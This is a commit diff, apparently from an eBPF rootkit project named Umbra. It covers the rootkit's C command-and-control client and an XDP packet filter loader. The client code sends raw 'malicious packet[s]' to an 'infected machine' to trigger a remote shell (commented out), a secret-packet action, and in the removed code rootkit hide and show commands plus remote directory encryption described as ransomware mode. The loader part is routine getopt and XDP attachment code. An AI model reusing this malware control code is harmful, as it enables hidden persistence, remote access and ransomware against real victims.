Finished adapting the client. Cleaned the user code and added getopt. The filter fully works now. Next step: return data to userspace via a map.

src/.output/xdp_filter.skel.h

@@ -199,18 +199,18 @@ xdp_filter_bpf__create_skeleton(struct xdp_filter_bpf *obj)
 \x74\x2e\x31\0\x2e\x72\x6f\x64\x61\x74\x61\0\x6c\x69\x63\x65\x6e\x73\x65\0\x9f\
 \xeb\x01\0\x20\0\0\0\0\0\0\0\x14\0\0\0\x14\0\0\0\x4c\x01\0\0\x60\x01\0\0\0\0\0\
 \0\x08\0\0\0\x75\0\0\0\x01\0\0\0\0\0\0\0\x07\0\0\0\x10\0\0\0\x75\0\0\0\x14\0\0\
-\0\0\0\0\0\x7e\0\0\0\xaa\0\0\0\0\xc4\0\0\x08\0\0\0\x7e\0\0\0\xce\0\0\0\x05\xcc\
+\0\0\0\0\0\x7e\0\0\0\xaa\0\0\0\0\xcc\0\0\x08\0\0\0\x7e\0\0\0\xce\0\0\0\x05\xd4\
-\0\0\x30\0\0\0\x7e\0\0\0\xf1\0\0\0\x25\xd8\0\0\x38\0\0\0\x7e\0\0\0\x1b\x01\0\0\
+\0\0\x30\0\0\0\x7e\0\0\0\xf1\0\0\0\x25\xe0\0\0\x38\0\0\0\x7e\0\0\0\x1b\x01\0\0\
-\x29\xd4\0\0\x40\0\0\0\x7e\0\0\0\x4d\x01\0\0\x15\x14\x01\0\x50\0\0\0\x7e\0\0\0\
+\x29\xdc\0\0\x40\0\0\0\x7e\0\0\0\x4d\x01\0\0\x15\x1c\x01\0\x50\0\0\0\x7e\0\0\0\
-\x4d\x01\0\0\x09\x14\x01\0\x80\0\0\0\x7e\0\0\0\x7c\x01\0\0\x09\x30\x01\0\x98\0\
+\x4d\x01\0\0\x09\x1c\x01\0\x80\0\0\0\x7e\0\0\0\x7c\x01\0\0\x09\x38\x01\0\x98\0\
-\0\0\x7e\0\0\0\xa1\x01\0\0\x0e\x4c\x01\0\xa0\0\0\0\x7e\0\0\0\xa1\x01\0\0\x09\
+\0\0\x7e\0\0\0\xa1\x01\0\0\x0e\x54\x01\0\xa0\0\0\0\x7e\0\0\0\xa1\x01\0\0\x09\
-\x4c\x01\0\xb8\0\0\0\x7e\0\0\0\xc3\x01\0\0\x09\x64\x01\0\xd0\0\0\0\x7e\0\0\0\
+\x54\x01\0\xb8\0\0\0\x7e\0\0\0\xc3\x01\0\0\x09\x6c\x01\0\xd0\0\0\0\x7e\0\0\0\
-\xf7\x01\0\0\x0d\x90\x01\0\xd8\0\0\0\x7e\0\0\0\xf7\x01\0\0\x0d\x90\x01\0\xe0\0\
+\xf7\x01\0\0\x0d\x98\x01\0\xd8\0\0\0\x7e\0\0\0\xf7\x01\0\0\x0d\x98\x01\0\xe0\0\
-\0\0\x7e\0\0\0\x23\x02\0\0\x01\xcc\x01\0\xe8\0\0\0\x7e\0\0\0\xf7\x01\0\0\x0d\
+\0\0\x7e\0\0\0\x23\x02\0\0\x01\xd4\x01\0\xe8\0\0\0\x7e\0\0\0\xf7\x01\0\0\x0d\
-\x90\x01\0\xf0\0\0\0\x7e\0\0\0\xf7\x01\0\0\x0d\x90\x01\0\0\x01\0\0\x7e\0\0\0\
+\x98\x01\0\xf0\0\0\0\x7e\0\0\0\xf7\x01\0\0\x0d\x98\x01\0\0\x01\0\0\x7e\0\0\0\
-\xf7\x01\0\0\x0d\x90\x01\0\x08\x01\0\0\x7e\0\0\0\xf7\x01\0\0\x0d\x90\x01\0\x10\
+\xf7\x01\0\0\x0d\x98\x01\0\x08\x01\0\0\x7e\0\0\0\xf7\x01\0\0\x0d\x98\x01\0\x10\
-\x01\0\0\x7e\0\0\0\xf7\x01\0\0\x0d\x90\x01\0\x18\x01\0\0\x7e\0\0\0\xf7\x01\0\0\
+\x01\0\0\x7e\0\0\0\xf7\x01\0\0\x0d\x98\x01\0\x18\x01\0\0\x7e\0\0\0\xf7\x01\0\0\
-\x0d\x90\x01\0\x20\x01\0\0\x7e\0\0\0\x25\x02\0\0\x05\x9c\x01\0\0\0\0\0\0\0\0\0\
+\x0d\x98\x01\0\x20\x01\0\0\x7e\0\0\0\x25\x02\0\0\x05\xa4\x01\0\0\0\0\0\0\0\0\0\
 \0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\xa4\0\0\0\0\0\x02\0\0\x01\0\0\0\0\
 \0\0\0\0\0\0\0\0\0\0\x87\0\0\0\0\0\x02\0\xe8\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x80\
 \0\0\0\0\0\x02\0\xe0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x14\0\0\0\x01\0\x04\0\0\0\0\

src/client/client.c

@@ -9,6 +9,8 @@
 #include <netdb.h>
 #include <stdlib.h>
 
+#include "../constants/constants.h"
+
 // For printing with colors
 #define KGRN  "\x1B[32m"
 #define KYLW  "\x1B[33m"
@@ -75,7 +77,7 @@ char* getLocalIpAddress(){
 }
 
 
-void get_shell(char* argv){
+/*void get_shell(char* argv){
     char* local_ip = getLocalIpAddress();
     printf("["KBLU"INFO"RESET"]""Victim IP selected: %s\n", argv);
     check_ip_address_format(argv);
@@ -114,13 +116,13 @@ void get_shell(char* argv){
     }
     
     free(local_ip);
-}
+}*/
 
-void show_rootkit(char* argv){
+void send_secret_packet(char* argv){
     char* local_ip = getLocalIpAddress();
     printf("["KBLU"INFO"RESET"]""Victim IP selected: %s\n", argv);
     check_ip_address_format(argv);
-    packet_t packet = build_standard_packet(9000, 9000, local_ip, argv, 2048, "UMBRA_SHOW_ROOTKIT");
+    packet_t packet = build_standard_packet(9000, 9000, local_ip, argv, 2048, SECRET_PACKET_PAYLOAD);
     printf("["KBLU"INFO"RESET"]""Sending malicious packet to infected machine...\n");
     //Sending the malicious payload
     if(rawsocket_send(packet)<0){
@@ -131,61 +133,6 @@ void show_rootkit(char* argv){
     free(local_ip);
 }
 
-void hide_rootkit(char* argv){
-    char* local_ip = getLocalIpAddress();
-    printf("["KBLU"INFO"RESET"]""Victim IP selected: %s\n", argv);
-    check_ip_address_format(argv);
-    packet_t packet = build_standard_packet(9000, 9000, local_ip, argv, 2048, "UMBRA_HIDE_ROOTKIT");
-    printf("["KBLU"INFO"RESET"]""Sending malicious packet to infected machine...\n");
-    //Sending the malicious payload
-    if(rawsocket_send(packet)<0){
-        printf("["KRED"ERROR"RESET"]""An error occured. Is the machine up?\n");
-    }else{
-        printf("["KGRN"OK"RESET"]""Request to hide successfully sent!\n");
-    }
-    free(local_ip);
-}
-
-void encrypt_directory(char* argv, char* dir){
-    char* local_ip = getLocalIpAddress();
-    printf("["KBLU"INFO"RESET"]""Victim IP selected: %s\n", argv);
-    printf("["KBLU"INFO"RESET"]""Target PATH selected: %s\n", dir);
-    char data_buffer[1024];
-    strcpy(data_buffer, "UMBRA_ENCRYPT_DIR");
-    strcat(data_buffer, dir);
-    check_ip_address_format(argv);
-    packet_t packet = build_standard_packet(9000, 9000, local_ip, argv, 2048, data_buffer);
-    printf("["KBLU"INFO"RESET"]""Sending malicious packet to infected machine...\n");
-    //Sending the malicious payload
-    if(rawsocket_send(packet)<0){
-        printf("["KRED"ERROR"RESET"]""An error occured. Is the machine up?\n");
-    }else{
-        printf("["KGRN"OK"RESET"]""Request to encrypt directory successfully sent!\n");
-    }
-    free(local_ip);
-}
-
-void decrypt_directory(char* argv, char* dir){
-    char* local_ip = getLocalIpAddress();
-    printf("["KBLU"INFO"RESET"]""Victim IP selected: %s\n", argv);
-    printf("["KBLU"INFO"RESET"]""Target PATH selected: %s\n", dir);
-    char data_buffer[1024];
-    strcpy(data_buffer, "UMBRA_DECRYPT_DIR");
-    strcat(data_buffer, dir);
-    check_ip_address_format(argv);
-    packet_t packet = build_standard_packet(9000, 9000, local_ip, argv, 2048, data_buffer);
-    printf("["KBLU"INFO"RESET"]""Sending malicious packet to infected machine...\n");
-    //Sending the malicious payload
-    if(rawsocket_send(packet)<0){
-        printf("["KRED"ERROR"RESET"]""An error occured. Is the machine up?\n");
-    }else{
-        printf("["KGRN"OK"RESET"]""Request to decrypt directory successfully sent!\n");
-    }
-    free(local_ip);
-}
-
-
-
 
 void main(int argc, char* argv[]){
     if(argc<2){
@@ -214,7 +161,7 @@ void main(int argc, char* argv[]){
             printf("["KBLU"INFO"RESET"]""Activated SEND a SECRET mode\n");
             //printf("Option S has argument %s\n", optarg);
             strcpy(dest_address, optarg);
-            get_shell(dest_address);
+            send_secret_packet(dest_address);
             PARAM_MODULE_ACTIVATED = 1;
             
             break;
@@ -272,20 +219,7 @@ void main(int argc, char* argv[]){
         }
     }
 
-    //Checking activated mode, for those requiring multiple args
+    if(PARAM_MODULE_ACTIVATED==0){
-    if(ENCRYPT_MODE_SEL == 1 && PATH_ARG_PROVIDED == 1){
-        print_welcome_message();
-        sleep(1);
-        //Selecting encrypt directory - Ransomware ON mode
-        printf("["KBLU"INFO"RESET"]""Selected ENCRYPT a rootkit remotely\n");
-        encrypt_directory(dest_address, path_arg);
-    }else if(DECRYPT_MODE_SEL == 1 && PATH_ARG_PROVIDED == 1){
-        print_welcome_message();
-        sleep(1);
-        //Selecting encrypt directory - Ransomware ON mode
-        printf("["KBLU"INFO"RESET"]""Selected DECRYPT a rootkit remotely\n");
-        decrypt_directory(dest_address, path_arg);
-    }else if(PARAM_MODULE_ACTIVATED==0){
         printf("["KRED"ERROR"RESET"]""Invalid parameters\n");
         print_help_dialog(argv[0]);
         exit(EXIT_FAILURE);

src/constants/constants.h

@@ -0,0 +1,6 @@
+#ifndef __CONSTANTS_H
+#define __CONSTANTS_H
+
+#define SECRET_PACKET_PAYLOAD "test"
+
+#endif

src/ebpf/xdp_filter.bpf.c

@@ -14,13 +14,15 @@
 #include <bpf/bpf_helpers.h>
 #include <bpf/bpf_tracing.h>
 #include <bpf/bpf_core_read.h>
-#include "../user/xdp_filter.h"
 #include <arpa/inet.h>
 #include <linux/bpf.h>
 #include <linux/if_ether.h>
 #include <linux/ip.h>
 #include <linux/udp.h>
 
+#include "../user/xdp_filter.h"
+#include "../constants/constants.h"
+
 
 char LICENSE[] SEC("license") = "Dual BSD/GPL";
 

src/user/xdp_filter.c

@@ -5,50 +5,32 @@
 #include <sys/resource.h>
 #include <bpf/libbpf.h>
 #include <linux/if_link.h>
+#include <net/if.h>
+#include <unistd.h>
+
 #include "xdp_filter.skel.h"
 #include "xdp_filter.h"
-#include <net/if.h>
+#include "../constants/constants.h"
 
 static struct env {
 	bool verbose;
 } env;
 
-const char *argp_program_version = "xdp_filter 0.1";
+void print_help_dialog(const char* arg){
-const char *argp_program_bug_address = "<marcossanchezbajo@gmail.com>";
+    printf("\nUsage: %s ./xdp_filter OPTION\n\n", arg);
-const char argp_program_doc[] =
+    printf("Program OPTIONs\n");
-"My first eBPF packet filter using Express Data Path (XDP)\n"
+    char* line = "-t[NETWORK INTERFACE]";
-"\n"
+    char* desc = "Activate XDP filter";
-"TODO DESCRIPTION\n"
+    printf("\t%-40s %-50s\n\n", line, desc);
-"\n"
+	line = "-v";
-"USAGE: ./xdp_filter [-v]\n";
+    desc = "Verbose mode";
+    printf("\t%-40s %-50s\n\n", line, desc);
+    line = "-h";
+    desc = "Print this help";
+    printf("\t%-40s %-50s\n\n", line, desc);
 
-/*Options for argp*/
-static const struct argp_option opts[] = {
-	{ "verbose", 'v', NULL, 0, "Verbose debug output" },
-	{},
-};
-
-/*Command argument parsing, similar to getopt*/
-static error_t parse_arg(int key, char *arg, struct argp_state *state){
-	switch (key) {
-	case 'v':
-		env.verbose = true;
-		break;
-	case ARGP_KEY_ARG:
-		argp_usage(state);
-		break;
-	default:
-		return ARGP_ERR_UNKNOWN;
-	}
-	return 0;
 }
 
-static const struct argp argp = {
-	.options = opts,
-	.parser = parse_arg,
-	.doc = argp_program_doc,
-};
-
 /*Wrapper for printing into stderr when debug active*/
 static int libbpf_print_fn(enum libbpf_print_level level, const char *format, va_list args){
 	if (level == LIBBPF_DEBUG && !env.verbose)
@@ -100,79 +82,93 @@ int main(int argc, char**argv){
     struct xdp_filter_bpf *skel;
     int err;
 	
-	unsigned int ifindex = if_nametoindex(argv[1]);
+	unsigned int ifindex; 
 
 	/* Parse command line arguments */
-	/*err = argp_parse(&argp, argc, argv, 0, NULL, NULL);
+	int opt;
-	if (err)
+	while ((opt = getopt(argc, argv, ":t:vh")) != -1) {
-		return err;*/
+        switch (opt) {
+        case 't':
+            ifindex = if_nametoindex(optarg);
+            printf("Activating filter on network interface: %s\n", optarg);
+            if(ifindex == 0){
+				perror("Error on input interface");
+				exit(EXIT_FAILURE);
+			}
+			break;
+		case 'v':
+			//Verbose output
+			env.verbose = true;
+			break;
 
-	/* Set up libbpf errors and debug info callback */
+        case 'h':
+            print_help_dialog(argv[0]);
+            exit(0);
+            break;
+        case '?':
+            printf("Unknown option: %c\n", optopt);
+			exit(EXIT_FAILURE);
+            break;
+        case ':':
+            printf("Missing arguments for %c\n", optopt);
+            exit(EXIT_FAILURE);
+            break;
+        
+        default:
+            print_help_dialog(argv[0]);
+            exit(EXIT_FAILURE);
+        }
+    }
+	
+	// Set up libbpf errors and debug info callback
 	libbpf_set_print(libbpf_print_fn);
 
-	/* Bump RLIMIT_MEMLOCK to create BPF maps */
+	// Bump RLIMIT_MEMLOCK to be able to create BPF maps
 	bump_memlock_rlimit();
 
-	/* Cleaner handling of Ctrl-C */
+	// Cleaner handling of Ctrl-C
 	signal(SIGINT, sig_handler);
 	signal(SIGTERM, sig_handler);
 
-    /* Load and verify BPF application */
+    // Load and verify BPF application
 	skel = xdp_filter_bpf__open();
 	if (!skel) {
 		fprintf(stderr, "Failed to open and load BPF skeleton\n");
 		return 1;
 	}
 
-	/* Load & verify BPF programs */
+	// Load & verify BPF programs */
 	err = xdp_filter_bpf__load(skel);
 	if (err) {
 		fprintf(stderr, "Failed to load and verify BPF skeleton\n");
 		goto cleanup;
 	}
 
-    /* Attach tracepoints */
+    // Attach tracepoints
-	err = xdp_filter_bpf__attach(skel);
+	/*err = xdp_filter_bpf__attach(skel);
 	if (err) {
 		fprintf(stderr, "Failed to attach BPF skeleton\n");
 		goto cleanup;
-	}
-
-	int flags = XDP_FLAGS_SKB_MODE;
-    int fd = bpf_program__fd(skel->progs.xdp_receive);
-
-    err = bpf_set_link_xdp_fd(ifindex, fd, flags);
-
-    /* Set up ring buffer polling */
-	/*rb = ring_buffer__new(bpf_map__fd(skel->maps.rb), handle_event, NULL, NULL);
-	if (!rb) {
-		err = -1;
-		fprintf(stderr, "Failed to create ring buffer\n");
-		goto cleanup;
 	}*/
 
-    	/* Process events */
+	//Attack BPF program to network interface
-	printf("%-8s %-5s %-16s %-7s %-7s %s\n",
+	int flags = XDP_FLAGS_SKB_MODE;
-	       "TIME", "EVENT", "COMM", "PID", "PPID", "FILENAME/EXIT CODE");
+    int fd = bpf_program__fd(skel->progs.xdp_receive);
+    err = bpf_set_link_xdp_fd(ifindex, fd, flags);
+
+	printf("Filter set and ready\n");
 	while (!exiting) {
-		//err = ring_buffer__poll(rb, 100 /* timeout, ms */);
+		/* trigger our BPF program */
-		/* Ctrl-C will cause -EINTR */
+		fprintf(stderr, ".");
-		if (err == -EINTR) {
+		sleep(1);
-			err = 0;
-			break;
-		}
-		if (err < 0) {
-			printf("Error polling perf buffer: %d\n", err);
-			break;
-		}
 	}
 
+	//Received signal to stop, detach program from network interface
 	fd = -1;
     err = bpf_set_link_xdp_fd(ifindex, fd, flags);
 
+
     cleanup:
-        /* Clean up */
-        //ring_buffer__free(rb);
         xdp_filter_bpf__destroy(skel);
 
         return err < 0 ? -err : 0;